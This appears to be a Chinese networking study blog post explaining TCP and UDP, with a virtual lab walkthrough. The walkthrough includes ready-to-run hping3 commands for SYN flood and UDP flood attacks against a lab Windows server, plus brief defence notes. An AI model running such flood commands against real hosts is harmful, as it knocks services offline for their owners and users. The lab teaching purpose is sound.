传输层协议 1.TCP 2.UDP

传输层协议

1.TCP

2.UDP

TCP协议

回顾内容

  1. 传输层功能:定义应用层协议数据报文的端口号,流量控制
  2. 对原始数据进行分段处理

传输层所提供服务

  • 传输连接服务
  • 数据传输服务:流量控制、差错控制、序列控制

一、传输层的TCP协议

1.面向连接的传输协议

  • 要求数据在传输以前必须建立连接,数据传输后,必须释放连接
  • 仅支持单播传输,在两个终端之间建立的点对点连接

2.UDP用户数据报协议

二、TCP报文字段

字段含义:TCP报文格式详解,图解超详细!

【计算机网络】TCP协议------1.报文格式详解_tcp报文-CSDN博客

1.建立三次握手
2.TCP释放连接的四次挥手
3.TCP半关闭状态
4.TCP半连接状态

会产生SYN flood,属于DoS的一种。

5.常见TCP端口号
  • 21 FTP
  • 22 SSH
  • 23 TELNET
  • 25 SMTP
  • 53 DNS
  • 80 HTTP
  • 110 POP3
  • 143 IMAP4
  • 443 HTTPS
  • 3306 MYSQL
  • 3389 RDP

三、实施SYN flood

实施:

  • 在kali上使用hping3工具

防御:

  • 使用TCP代理(防火墙),比如10G的带宽,需要很多个w
  • TCP源探测,防火墙开启该功能,下一代防火墙
1.GNS3中
  • 安装好GNS3之后,进行配置

python 复制代码
#进入路由器中
2.kali中

输入:进入vim

python 复制代码
#在kali中,将网段设置成VMnet1
vim /etc/...
#按下A键
#写入
auto eth0
iface eth0 inet static
address 192.168.1.50
netmask 255.255.255.0
gateway 192.168.1.254
#写完后按下esc键,:
:wq! #保存并退出

ifdown eth0 #关闭网口
ifup eth0 #打开网口
ifconfig #查看kali的IP地址
route -n #查看路由表
python 复制代码
#在Windows server 2016中,将网络设置为VMnet8
#W配置IP地址
#进入cmd
netsh interface ip set address "Ethernet0" static 192.168.2.100 255.255.255.0 192.168.2.254
ipconfig
python 复制代码
#在kali中实施攻击
hping -c 1000 -d 200 -S -w 64 -p 80 --flood --rand-source 192.168.2.100

四、Windows Server 2016搭建网站

  • 打开服务器管理器
  • 管理
  • 添加角色和功能
  • 下一步,下一步
  • 服务器选择:下一步
  • 勾选web服务器,添加功能,下一步
  • 一直下一步,直到安装

五、安装GNS3

超详细GNS3安装和使用教程,避免各种报错 - ghbuff - 博客园

【CCNP | 网络模拟器GNS系列】安装、配置和使用 GNS3_gns3的安装步骤及导入路由器镜像的过程-CSDN博客

UDP协议

UDP(用户数据报)协议,是传输层的另外一个协议

一、简单概念

1、特点

不需要建立连接,直接发送数据,不会去重新排序,不需要确认

2、报文字段
  • 源端口
  • 目标端口
  • UDP长度
  • UDP校验和
3、常见的UDP端口号
  • 53 DNS
  • 69 TFTP
  • 111 RPC
  • 123 NTP
  • 161 SNMP

二、实施UDP Flood攻击

配置路由器IP

在Windows中

netstat -anop udp

开启53号端口

在kali中实施攻击

hping3 -q -n --rand-source --udp -p 53 --flood 192.168.2.100 -d 10000

相关推荐
Rocket MAN7 分钟前
在 Ubuntu 中配置 Samba 实现「特定用户可写,其他用户只读」的共享目录
网络·windows·ubuntu
Nina_71722 分钟前
python简易实现勒索病毒
网络·python·网络安全
白山云北诗1 小时前
网站防护如何无惧 DDoS 攻击?
网络安全·ddos·网站安全·ddos攻击如何防护·企业网站安全
胡耀超2 小时前
内网渗透技术全面指南——安全业务视角(基于《内网渗透技术 (吴丽进、苗春雨 主编;郑州、雷珊珊、王伦 副主编)》)
linux·windows·安全·web安全·网络安全·内网渗透·安全治理
Mr-Apple2 小时前
Decode rpc invocation failed: null -> DecodeableRpcInvocation
网络·网络协议·rpc
IpdataCloud3 小时前
IP 风险画像如何实现对恶意 IP 的有效拦截?
网络·网络协议·tcp/ip
运维有小邓@3 小时前
比较入站和出站防火墙规则
服务器·网络·php
IT小饕餮3 小时前
MUX-vlan
网络
TPBoreas3 小时前
Ubuntu开放端口
linux·服务器·网络
JAVA学习通4 小时前
【JavaEE】 HTTP协议(1.0)
网络·网络协议·http